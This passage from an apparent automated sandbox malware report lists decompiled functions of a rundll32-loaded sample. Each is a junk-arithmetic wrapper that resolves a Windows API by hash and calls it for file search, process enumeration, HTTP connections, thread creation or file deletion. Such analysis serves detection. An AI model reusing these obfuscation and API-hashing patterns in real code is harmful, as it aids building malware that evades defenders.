Associated: 0000000F.00000002.2345336657.00000000002CC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2b0000_rundll32.jbxd

Yara matches

Similarity

API ID: ComputerName
String ID: /Fq
API String ID: 3545744682-1299280358
Opcode ID: d2b01d404bd79484d67768b9f36fce1e26be8233a3316e4eaad5ede2e67fc524
Instruction ID: 42e576b47f566838592e3d118f0667a6056a62cb683e63cde9f10aaf369c3b32
Opcode Fuzzy Hash: d2b01d404bd79484d67768b9f36fce1e26be8233a3316e4eaad5ede2e67fc524
Instruction Fuzzy Hash: C9011AB5C1120CFBDB04EFA4D94A9EEBFB4EF41314F108189E8086B251D3B54B649F91

Uniqueness

Uniqueness Score: -1.00%

Function 002B595A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37
fileCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E002B595A(void* __ecx, void* __edx, struct _WIN32_FIND_DATAW* _a4, intOrPtr _a8) {
				unsigned int _v8;
				signed int _v12;
				void* _t22;
				int _t27;
				void* _t33;

				_push(__ecx);
				_push(__ecx);
				_push(_a8);
				_t33 = __edx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E002B602B(_t22);
				_v8 = 0xecfb;
				_v8 = _v8 >> 5;
				_v8 = _v8 + 0x8346;
				_v8 = _v8 + 0xffffe2f9;
				_v8 = _v8 ^ 0x000008ac;
				_v12 = 0x34e0;
				_v12 = _v12 >> 0xf;
				_v12 = _v12 ^ 0x1d0c124c;
				_v12 = _v12 ^ 0x1d0c2b7f;
				E002C07A9(0xe8880df4, 0x9164b7cc, __ecx, __ecx, 0x196);
				_t27 = FindNextFileW(_t33, _a4); // executed
				return _t27;
			}

0x002b595d
0x002b595e
0x002b5960
0x002b5963
0x002b5965
0x002b5968
0x002b5969
0x002b596a
0x002b596f
0x002b5979
0x002b5982
0x002b5989
0x002b5990
0x002b5997
0x002b599e
0x002b59a2
0x002b59a9
0x002b59c2
0x002b59ce
0x002b59d4

APIs

FindNextFileW.KERNEL32(?,1D0C2B7F), ref: 002B59CE

Strings

4, xrefs: 002B5997

Memory Dump Source

Source File: 0000000F.00000002.2345325449.00000000002B1000.00000020.00000001.sdmp, Offset: 002B0000, based on PE: true

Associated: 0000000F.00000002.2345321393.00000000002B0000.00000004.00000001.sdmp Download File
Associated: 0000000F.00000002.2345336657.00000000002CC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2b0000_rundll32.jbxd

Yara matches

Similarity

API ID: FileFindNext
String ID: 4
API String ID: 2029273394-293933855
Opcode ID: 7c87f46dbf01ac71fdd96b1192808780aa717a036f6e3d3bbce4727d036999bd
Instruction ID: 0af6db2906dd874f1becb0b4b5394008645b61843a61433c9a1d880c28ae2261
Opcode Fuzzy Hash: 7c87f46dbf01ac71fdd96b1192808780aa717a036f6e3d3bbce4727d036999bd
Instruction Fuzzy Hash: 20014B76D11208BBEB14DFA4C84A8DEBE78EF40354F108188E80867250D7B25F249B92

Uniqueness

Uniqueness Score: -1.00%

Function 002C4F7D, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E002C4F7D(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t17;
				int _t24;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E002B602B(_t17);
				_v12 = 0xddd8;
				_v12 = _v12 * 0x48;
				_v12 = _v12 ^ 0x003e66d8;
				_v8 = 0xcb35;
				_v8 = _v8 ^ 0x7b88573c;
				_v8 = _v8 * 0x59;
				_v8 = _v8 ^ 0xf27e4a21;
				E002C07A9(0x6d6c237b, 0x9164b7cc, __ecx, __ecx, 0xce);
				_t24 = CloseHandle(_a4); // executed
				return _t24;
			}

0x002c4f80
0x002c4f81
0x002c4f82
0x002c4f86
0x002c4f87
0x002c4f8c
0x002c4fa5
0x002c4fa8
0x002c4faf
0x002c4fb6
0x002c4fc7
0x002c4fca
0x002c4fd7
0x002c4fe2
0x002c4fe7

APIs

CloseHandle.KERNEL32(003E66D8), ref: 002C4FE2

Strings

{#lm, xrefs: 002C4FC2

Memory Dump Source

Source File: 0000000F.00000002.2345325449.00000000002B1000.00000020.00000001.sdmp, Offset: 002B0000, based on PE: true

Associated: 0000000F.00000002.2345321393.00000000002B0000.00000004.00000001.sdmp Download File
Associated: 0000000F.00000002.2345336657.00000000002CC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2b0000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID: {#lm
API String ID: 2962429428-1564096886
Opcode ID: 7df0185c2930fb0200a486f9c33d29b23fc7f0daa0c3c6090cb6242b0ea75d03
Instruction ID: 289b4fa28fedc7fa3fb7bbd5d1bd18280ea6622c55ab08f5d8d8ed82d40fc190
Opcode Fuzzy Hash: 7df0185c2930fb0200a486f9c33d29b23fc7f0daa0c3c6090cb6242b0ea75d03
Instruction Fuzzy Hash: 92F037B081120CFFDB08EFA4D98689EBFBAEB40340F20829DE804AB250D3715B549B50

Uniqueness

Uniqueness Score: -1.00%

Function 002C7955, Relevance: 1.6, APIs: 1, Instructions: 62
networkCOMMON

Download Yara Rule

C-Code - Quality: 43%

			E002C7955(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, WCHAR* _a36, void* _a44, intOrPtr _a52) {
				signed int _v8;
				signed int _v12;
				WCHAR* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t41;
				short _t47;

				_push(_a52);
				_t47 = __ecx;
				_push(0);
				_push(_a44);
				_push(0);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(0);
				_push(_a4);
				_push(__ecx & 0x0000ffff);
				E002B602B(__ecx & 0x0000ffff);
				_v24 = 0x1f9770;
				_v20 = 0x380697;
				_v16 = 0;
				_v12 = 0x6440;
				_v12 = _v12 * 0xf;
				_v12 = _v12 * 0x65;
				_v12 = _v12 ^ 0x02513e1b;
				_v8 = 0x9d26;
				_v8 = _v8 << 0xa;
				_v8 = _v8 ^ 0x42bae3e2;
				_v8 = _v8 + 0x19dc;
				_v8 = _v8 ^ 0x40ce99cc;
				E002C07A9(0x73a58955, 0x1f801b8, __ecx, __ecx, 0x1fa);
				_t41 = InternetConnectW(_a44, _a36, _t47, 0, 0, _a32, 0, 0); // executed
				return _t41;
			}

0x002c795d
0x002c7962
0x002c7964
0x002c7965
0x002c796b
0x002c796c
0x002c796f
0x002c7972
0x002c7975
0x002c7978
0x002c7979
0x002c797c
0x002c797f
0x002c7980
0x002c7984
0x002c7985
0x002c798a
0x002c7994
0x002c79a0
0x002c79a3
0x002c79ba
0x002c79c1
0x002c79c4
0x002c79cb
0x002c79d2
0x002c79d6
0x002c79dd
0x002c79e4
0x002c79f1
0x002c7a07
0x002c7a0e

APIs

InternetConnectW.WININET(?,?,?,00000000,00000000,?,00000000,00000000), ref: 002C7A07

Memory Dump Source

Source File: 0000000F.00000002.2345325449.00000000002B1000.00000020.00000001.sdmp, Offset: 002B0000, based on PE: true

Associated: 0000000F.00000002.2345321393.00000000002B0000.00000004.00000001.sdmp Download File
Associated: 0000000F.00000002.2345336657.00000000002CC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2b0000_rundll32.jbxd

Yara matches

Similarity

API ID: ConnectInternet
String ID:
API String ID: 3050416762-0
Opcode ID: a5cc7dfa8e1f578d9882cc34f057ad90facde6536c1dd8886fbecc1955af6ef0
Instruction ID: 993d32882a4292624960f1f69bb8e04eb3b8b9e48029f9d2d88846a88486692b
Opcode Fuzzy Hash: a5cc7dfa8e1f578d9882cc34f057ad90facde6536c1dd8886fbecc1955af6ef0
Instruction Fuzzy Hash: 45212472800248BBCF119F92CD49CDFBFB9FF89718F108199F90566120D7719A64DB60

Uniqueness

Uniqueness Score: -1.00%

Function 002C375D, Relevance: 1.6, APIs: 1, Instructions: 61
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E002C375D(void* __edx, WCHAR* _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, DWORD* _a32, intOrPtr _a36, intOrPtr _a44, intOrPtr _a52) {
				signed int _v8;
				signed int _v12;
				WCHAR* _v16;
				WCHAR* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t35;
				int _t42;
				signed int _t43;

				_push(_a52);
				_push(0);
				_push(_a44);
				_push(0);
				_push(_a36);
				_push(_a32);
				_push(0);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(0);
				_push(0);
				_push(0);
				E002B602B(_t35);
				_v28 = 0x6b2c80;
				_v24 = 0x4fb02;
				_v20 = 0;
				_v16 = 0;
				_v8 = 0xe6a1;
				_v8 = _v8 ^ 0xa0873718;
				_v8 = _v8 + 0xffffab24;
				_v8 = _v8 ^ 0x2595dee0;
				_v8 = _v8 ^ 0x8512f71c;
				_v12 = 0x8058;
				_t43 = 5;
				_v12 = _v12 / _t43;
				_v12 = _v12 ^ 0x000051c4;
				E002C07A9(0xb356cba0, 0x9164b7cc, _t43, _t43, 0x178);
				_t42 = GetVolumeInformationW(_a12, 0, 0, _a32, 0, 0, 0, 0); // executed
				return _t42;
			}

0x002c3764
0x002c3769
0x002c376a
0x002c376d
0x002c376e
0x002c3771
0x002c3774
0x002c3775
0x002c3778
0x002c377b
0x002c377e
0x002c3781
0x002c3782
0x002c3784
0x002c3785
0x002c378a
0x002c3794
0x002c379d
0x002c37a0
0x002c37a3
0x002c37aa
0x002c37b1
0x002c37b8
0x002c37bf
0x002c37c6
0x002c37d2
0x002c37da
0x002c37e2
0x002c37f6
0x002c380a
0x002c3810

APIs

GetVolumeInformationW.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 002C380A

Memory Dump Source

Source File: 0000000F.00000002.2345325449.00000000002B1000.00000020.00000001.sdmp, Offset: 002B0000, based on PE: true

Associated: 0000000F.00000002.2345321393.00000000002B0000.00000004.00000001.sdmp Download File
Associated: 0000000F.00000002.2345336657.00000000002CC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2b0000_rundll32.jbxd

Yara matches

Similarity

API ID: InformationVolume
String ID:
API String ID: 2039140958-0
Opcode ID: 6496ad685a24056dcbb86ceb1cdfa10e7083617a585bea956de5cffdf49062df
Instruction ID: 5fd017d9bb62fe0cd4e6da74c85af78c6b17a8b00b2e78b34f20499ab438b2ea
Opcode Fuzzy Hash: 6496ad685a24056dcbb86ceb1cdfa10e7083617a585bea956de5cffdf49062df
Instruction Fuzzy Hash: AF1117B1802219BBCF55DF95DD098DF7EB9EF493A0F104148F90862160C3B14A64DBE1

Uniqueness

Uniqueness Score: -1.00%

Function 002BB566, Relevance: 1.6, APIs: 1, Instructions: 55
fileCOMMON

Download Yara Rule

C-Code - Quality: 31%

			E002BB566(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, intOrPtr _a36, intOrPtr _a40, long _a44, WCHAR* _a48) {
				unsigned int _v8;
				signed int _v12;
				void* _t32;
				void* _t38;
				long _t47;

				_push(__ecx);
				_push(__ecx);
				_push(_a48);
				_t47 = __edx;
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(0);
				E002B602B(_t32);
				_v8 = 0xfd14;
				_v8 = _v8 >> 4;
				_v8 = _v8 * 0x7a;
				_v8 = _v8 >> 9;
				_v8 = _v8 ^ 0x00002bef;
				_v12 = 0x4f26;
				_v12 = _v12 | 0xe7e97f76;
				_v12 = _v12 ^ 0xe7e94dbb;
				E002C07A9(0xfbdf2264, 0x9164b7cc, __ecx, __ecx, 0x1bd);
				_t38 = CreateFileW(_a48, _a12, _t47, 0, _a44, _a32, 0); // executed
				return _t38;
			}

0x002bb569
0x002bb56a
0x002bb56d
0x002bb572
0x002bb574
0x002bb577
0x002bb57a
0x002bb57d
0x002bb580
0x002bb583
0x002bb586
0x002bb587
0x002bb58a
0x002bb58d
0x002bb590
0x002bb593
0x002bb594
0x002bb595
0x002bb59a
0x002bb5a4
0x002bb5b8
0x002bb5c0
0x002bb5c4
0x002bb5cb
0x002bb5d2
0x002bb5d9
0x002bb5e6
0x002bb5fd
0x002bb604

APIs

CreateFileW.KERNEL32(A45C8003,?,9C67384B,00000000,0ADDA027,53345D77,00000000), ref: 002BB5FD

Memory Dump Source

Source File: 0000000F.00000002.2345325449.00000000002B1000.00000020.00000001.sdmp, Offset: 002B0000, based on PE: true

Associated: 0000000F.00000002.2345321393.00000000002B0000.00000004.00000001.sdmp Download File
Associated: 0000000F.00000002.2345336657.00000000002CC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2b0000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 9acf8576e3394791eb4e7fd0c5ab37ca1dcf6349e082c5cec40e4e9b6d9fd2f2
Instruction ID: 0142f90aaa9f975db283af221b0819867f3f1665afc56e40cf5c73545f1b6fad
Opcode Fuzzy Hash: 9acf8576e3394791eb4e7fd0c5ab37ca1dcf6349e082c5cec40e4e9b6d9fd2f2
Instruction Fuzzy Hash: F111B272801248BBDF16DF95DD06CEE7F7AFF89314F148198FA1862120D3729A20EB50

Uniqueness

Uniqueness Score: -1.00%

Function 002C36D3, Relevance: 1.6, APIs: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E002C36D3(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				void* _v24;
				intOrPtr _v28;
				void* _t23;
				intOrPtr* _t30;
				void* _t31;
				void* _t32;
				signed int _t34;
				void* _t41;

				_t41 = __edx;
				_t32 = __ecx;
				E002B602B(_t23);
				_v28 = 0x12ca0f;
				asm("stosd");
				asm("stosd");
				_t34 = 0x2d;
				asm("stosd");
				_v8 = 0xdb27;
				_v8 = _v8 >> 9;
				_v8 = _v8 / _t34;
				_v8 = _v8 ^ 0x000020cb;
				_v12 = 0x489;
				_v12 = _v12 | 0x46cddb89;
				_v12 = _v12 ^ 0x46cde771;
				_t30 = E002C07A9(0x9dd48097, 0x9164b7cc, _t34, _t34, 0x113);
				_t31 =  *_t30(_t32, _t41, __ecx, __edx, _a4, _a8); // executed
				return _t31;
			}

0x002c36df
0x002c36e1
0x002c36e8
0x002c36ed
0x002c36fc
0x002c3701
0x002c3702
0x002c3709
0x002c370a
0x002c3711
0x002c371b
0x002c3723
0x002c372f
0x002c3736
0x002c373d
0x002c374a
0x002c3754
0x002c375c

APIs

ProcessIdToSessionId.KERNEL32(00000000,00000000,?,?,?,?,00000000,1B7BC3FB,?), ref: 002C3754

Memory Dump Source

Source File: 0000000F.00000002.2345325449.00000000002B1000.00000020.00000001.sdmp, Offset: 002B0000, based on PE: true

Associated: 0000000F.00000002.2345321393.00000000002B0000.00000004.00000001.sdmp Download File
Associated: 0000000F.00000002.2345336657.00000000002CC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2b0000_rundll32.jbxd

Yara matches

Similarity

API ID: ProcessSession
String ID:
API String ID: 3779259828-0
Opcode ID: 6deb829caf7ef43e93cab8b3b2866dc601534bac041292c3f842473e6acf7ff5
Instruction ID: 5a05923718d264de05e857b33f164bcff596c8df1deed073ebc8ec80d59f42de
Opcode Fuzzy Hash: 6deb829caf7ef43e93cab8b3b2866dc601534bac041292c3f842473e6acf7ff5
Instruction Fuzzy Hash: 2E01B975A01208FBEB04DBA9DC469DFFF74EF44364F104059E604A7251D7755F148BA0

Uniqueness

Uniqueness Score: -1.00%

Function 002B1132, Relevance: 1.5, APIs: 1, Instructions: 49
threadCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E002B1132(void* __ecx, intOrPtr _a8, void* _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, _Unknown_base(*)()* _a32) {
				unsigned int _v8;
				signed int _v12;
				void* _t27;
				void* _t33;

				_push(__ecx);
				_push(__ecx);
				_push(0);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(0);
				_push(_a8);
				_push(0);
				_push(0);
				_push(__ecx);
				E002B602B(_t27);
				_v12 = 0xe2c5;
				_v12 = _v12 * 0x1f;
				_v12 = _v12 | 0x070d55ff;
				_v12 = _v12 ^ 0x071f7e34;
				_v8 = 0x91c3;
				_v8 = _v8 + 0xffff5023;
				_v8 = _v8 << 0xd;
				_v8 = _v8 >> 1;
				_v8 = _v8 ^ 0x7e1e17b8;
				E002C07A9(0x4bc4bb1d, 0x9164b7cc, __ecx, __ecx, 0x235);
				_t33 = CreateThread(0, 0, _a32, _a16, 0, 0); // executed
				return _t33;
			}

0x002b1135
0x002b1136
0x002b113a
0x002b113b
0x002b113e
0x002b1141
0x002b1144
0x002b1147
0x002b114a
0x002b114b
0x002b114e
0x002b114f
0x002b1150
0x002b1151
0x002b1156
0x002b116f
0x002b1172
0x002b1179
0x002b1180
0x002b1187
0x002b118e
0x002b1192
0x002b1195
0x002b11a8
0x002b11ba
0x002b11c0

APIs

CreateThread.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 002B11BA

Memory Dump Source

Source File: 0000000F.00000002.2345325449.00000000002B1000.00000020.00000001.sdmp, Offset: 002B0000, based on PE: true

Associated: 0000000F.00000002.2345321393.00000000002B0000.00000004.00000001.sdmp Download File
Associated: 0000000F.00000002.2345336657.00000000002CC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2b0000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: cb0553482c322abf97d8835eeb0e28c15587e3b703a410a188fde19c900adf13
Instruction ID: fce959775139c1cd05ae1d25ad013532b3da5605525e38e666a713a6900a6aeb
Opcode Fuzzy Hash: cb0553482c322abf97d8835eeb0e28c15587e3b703a410a188fde19c900adf13
Instruction Fuzzy Hash: D901F772902219BBCF15DFA5DD49CDFBFB9EF09354F104188F90962250D2769A60DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 002C8422, Relevance: 1.5, APIs: 1, Instructions: 46
networkCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E002C8422(void* __ecx, void* __edx, intOrPtr _a4, WCHAR* _a8, void* _a12, long _a16, intOrPtr _a24, void* _a28) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t33;
				int _t40;

				_push(_a28);
				_push(_a24);
				_push(0xffffffff);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E002B602B(_t33);
				_v20 = _v20 & 0x00000000;
				_v16 = _v16 & 0x00000000;
				_v28 = 0x2f14d8;
				_v24 = 0x27cc4d;
				_v8 = 0xcfda;
				_v8 = _v8 << 7;
				_v8 = _v8 * 0x1b;
				_v8 = _v8 ^ 0xd01d7588;
				_v8 = _v8 ^ 0xdae8f2b7;
				_v12 = 0x64c6;
				_v12 = _v12 * 0x48;
				_v12 = _v12 ^ 0x001c0252;
				E002C07A9(0x234ee083, 0x1f801b8, __ecx, __ecx, 0x11c);
				_t40 = HttpSendRequestW(_a12, _a8, 0xffffffff, _a28, _a16); // executed
				return _t40;
			}

0x002c8428
0x002c842b
0x002c842e
0x002c8430
0x002c8433
0x002c8436
0x002c8439
0x002c843d
0x002c843e
0x002c8443
0x002c844a
0x002c8453
0x002c845a
0x002c8461
0x002c8468
0x002c847c
0x002c847f
0x002c8486
0x002c848d
0x002c8498
0x002c849b
0x002c84a8
0x002c84be
0x002c84c3

APIs

HttpSendRequestW.WININET(00000000,00000000,000000FF,?,0027CC4D), ref: 002C84BE

Memory Dump Source

Source File: 0000000F.00000002.2345325449.00000000002B1000.00000020.00000001.sdmp, Offset: 002B0000, based on PE: true

Associated: 0000000F.00000002.2345321393.00000000002B0000.00000004.00000001.sdmp Download File
Associated: 0000000F.00000002.2345336657.00000000002CC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2b0000_rundll32.jbxd

Yara matches

Similarity

API ID: HttpRequestSend
String ID:
API String ID: 360639707-0
Opcode ID: f6379289a10fe4900e83e69250910bd8ee8d1d9b0766bbc90ede220326e709f7
Instruction ID: 1c97599b42f4ab95c6efd63386d80dcc0d9f810bd9366388d857a95abaa3dacc
Opcode Fuzzy Hash: f6379289a10fe4900e83e69250910bd8ee8d1d9b0766bbc90ede220326e709f7
Instruction Fuzzy Hash: 611116B180120DFFCF05DF94CD469EEBFB6BB44314F208288F924662A1C3768B249B80

Uniqueness

Uniqueness Score: -1.00%

Function 002C981E, Relevance: 1.5, APIs: 1, Instructions: 43
memoryCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E002C981E(long __ecx, void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				void* _t22;
				void* _t28;
				void* _t34;
				long _t37;

				_push(__ecx);
				_push(__ecx);
				_push(_a16);
				_t34 = __edx;
				_t37 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E002B602B(_t22);
				_v12 = 0xe68;
				_v12 = _v12 * 0x39;
				_v12 = _v12 ^ 0xd1b1d871;
				_v12 = _v12 ^ 0xd1b2fb7e;
				_v8 = 0x629e;
				_v8 = _v8 + 0xfffff5da;
				_v8 = _v8 | 0xbef7b77b;
				_v8 = _v8 ^ 0xbef79fc3;
				E002C07A9(0xd2423672, 0x9164b7cc, __ecx, __ecx, 0x1ff);
				_t28 = RtlAllocateHeap(_t34, _a4, _t37); // executed
				return _t28;
			}

0x002c9821
0x002c9822
0x002c9825
0x002c9828
0x002c982a
0x002c982c
0x002c982f
0x002c9832
0x002c9835
0x002c9836
0x002c9837
0x002c983c
0x002c9855
0x002c9858
0x002c985f
0x002c9866
0x002c986d
0x002c9874
0x002c987b
0x002c988e
0x002c989b
0x002c98a2

APIs

RtlAllocateHeap.NTDLL(00000000,D1B2FB7E,00001000,?,?,?,002B87F2,0000CAAE,0000510C,AD82F196), ref: 002C989B

Memory Dump Source

Source File: 0000000F.00000002.2345325449.00000000002B1000.00000020.00000001.sdmp, Offset: 002B0000, based on PE: true

Associated: 0000000F.00000002.2345321393.00000000002B0000.00000004.00000001.sdmp Download File
Associated: 0000000F.00000002.2345336657.00000000002CC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2b0000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 8a0768dde0e7bf2d58d74200d499b49337f1603158062c9f943970ef98f7e083
Instruction ID: 7d04fc0d27746fbe6dbcd9a3a3939be2c7fd77b45599f15676042d7ac240dac1
Opcode Fuzzy Hash: 8a0768dde0e7bf2d58d74200d499b49337f1603158062c9f943970ef98f7e083
Instruction Fuzzy Hash: 44014876801208FBDB08EF95D846CDFBF79EF85750F10819DF918A6220E6715A619BA0

Uniqueness

Uniqueness Score: -1.00%

Function 002C9AC7, Relevance: 1.5, APIs: 1, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E002C9AC7(void* __ecx, void* __edx, struct tagPROCESSENTRY32W _a4, intOrPtr _a8, void* _a12) {
				signed int _v8;
				signed int _v12;
				void* _t26;
				int _t33;
				signed int _t35;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E002B602B(_t26);
				_v12 = 0x3a37;
				_t35 = 0x5f;
				_v12 = _v12 / _t35;
				_v12 = _v12 << 3;
				_v12 = _v12 ^ 0x0000271a;
				_v8 = 0x41ad;
				_v8 = _v8 ^ 0xae17da57;
				_v8 = _v8 + 0xffff40f3;
				_v8 = _v8 ^ 0xae16a338;
				E002C07A9(0xfb40698d, 0x9164b7cc, _t35, _t35, 0x16d);
				_t33 = Process32NextW(_a12, _a4); // executed
				return _t33;
			}

0x002c9acc
0x002c9acf
0x002c9ad2
0x002c9ad7
0x002c9adf
0x002c9aed
0x002c9af5
0x002c9afd
0x002c9b01
0x002c9b08
0x002c9b0f
0x002c9b16
0x002c9b1d
0x002c9b31
0x002c9b3f
0x002c9b44

APIs

Process32NextW.KERNEL32(DDC40DBA,0000271A), ref: 002C9B3F

Memory Dump Source

Source File: 0000000F.00000002.2345325449.00000000002B1000.00000020.00000001.sdmp, Offset: 002B0000, based on PE: true

Associated: 0000000F.00000002.2345321393.00000000002B0000.00000004.00000001.sdmp Download File
Associated: 0000000F.00000002.2345336657.00000000002CC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2b0000_rundll32.jbxd

Yara matches

Similarity

API ID: NextProcess32
String ID:
API String ID: 1850201408-0
Opcode ID: 6b7eb41694d76787e9a8305cca19d9506a715d0ec903bcb9295f44bd3fa0cb58
Instruction ID: 563fa8f2fa11ade58211c21b748306e23019e1f14c6178946783134d06269836
Opcode Fuzzy Hash: 6b7eb41694d76787e9a8305cca19d9506a715d0ec903bcb9295f44bd3fa0cb58
Instruction Fuzzy Hash: 6F0128B1910208BFEB04DFA4CC4A9AEBFB5EF44350F108198F509A6291D7B25B609F50

Uniqueness

Uniqueness Score: -1.00%

Function 002B7663, Relevance: 1.5, APIs: 1, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E002B7663(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a20) {
				signed int _v8;
				signed int _v12;
				void* _t22;
				intOrPtr* _t26;
				void* _t27;

				E002B602B(_t22);
				_v12 = 0xe6d;
				_v12 = _v12 | 0x830368b1;
				_v12 = _v12 ^ 0x83037da7;
				_v8 = 0xe4f2;
				_v8 = _v8 << 0xc;
				_v8 = _v8 << 5;
				_v8 = _v8 ^ 0xc9e423b1;
				_t26 = E002C07A9(0xeb8f70d2, 0x9164b7cc, __ecx, __ecx, 0xc5);
				_t27 =  *_t26(_a4, 0, _a8, _a12, __ecx, __edx, _a4, _a8, _a12, 0, _a20, __ecx, __ecx); // executed
				return _t27;
			}

0x002b7678
0x002b767d
0x002b7687
0x002b7693
0x002b769a
0x002b76a1
0x002b76a5
0x002b76a9
0x002b76c2
0x002b76d5
0x002b76da

APIs

QueryFullProcessImageNameW.KERNEL32(83037DA7,00000000,?,?,?,?,?,?,002B620E,00000000,?,?), ref: 002B76D5

Memory Dump Source

Source File: 0000000F.00000002.2345325449.00000000002B1000.00000020.00000001.sdmp, Offset: 002B0000, based on PE: true

Associated: 0000000F.00000002.2345321393.00000000002B0000.00000004.00000001.sdmp Download File
Associated: 0000000F.00000002.2345336657.00000000002CC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2b0000_rundll32.jbxd

Yara matches

Similarity

API ID: FullImageNameProcessQuery
String ID:
API String ID: 3578328331-0
Opcode ID: bb76f6c44c895bfb25ee897b27b410d4dad05f10fad42bd9a76b8a10b629559e
Instruction ID: ba5fed1ee27e6573855d6939b7cc24f22f586ba1ed155917fd4483e7d71b1cac
Opcode Fuzzy Hash: bb76f6c44c895bfb25ee897b27b410d4dad05f10fad42bd9a76b8a10b629559e
Instruction Fuzzy Hash: 0901467690020CFFEF059F90CC0AEAEBFB5EB44740F10818CFA1426260D2B29A609B90

Uniqueness

Uniqueness Score: -1.00%

Function 002CAA3C, Relevance: 1.5, APIs: 1, Instructions: 34
fileCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E002CAA3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				signed int _v8;
				unsigned int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E002B602B(_t21);
				_v12 = 0xcc49;
				_v12 = _v12 << 6;
				_v12 = _v12 >> 2;
				_v12 = _v12 ^ 0x000ca988;
				_v8 = 0x5d85;
				_v8 = _v8 | 0xb9d19a55;
				_v8 = _v8 * 0xd;
				_v8 = _v8 ^ 0x6fa87272;
				E002C07A9(0x330b490b, 0x9164b7cc, __ecx, __ecx, 0xb9);
				_t27 = DeleteFileW(_a12); // executed
				return _t27;
			}

0x002caa3f
0x002caa40
0x002caa41
0x002caa44
0x002caa47
0x002caa4b
0x002caa4c
0x002caa51
0x002caa5b
0x002caa64
0x002caa68
0x002caa6f
0x002caa76
0x002caa8d
0x002caa90
0x002caa9d
0x002caaa8
0x002caaad

APIs

DeleteFileW.KERNEL32(?,?,?,?,A6E18774,?,?), ref: 002CAAA8

Memory Dump Source

Source File: 0000000F.00000002.2345325449.00000000002B1000.00000020.00000001.sdmp, Offset: 002B0000, based on PE: true

Associated: 0000000F.00000002.2345321393.00000000002B0000.00000004.00000001.sdmp Download File
Associated: 0000000F.00000002.2345336657.00000000002CC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2b0000_rundll32.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
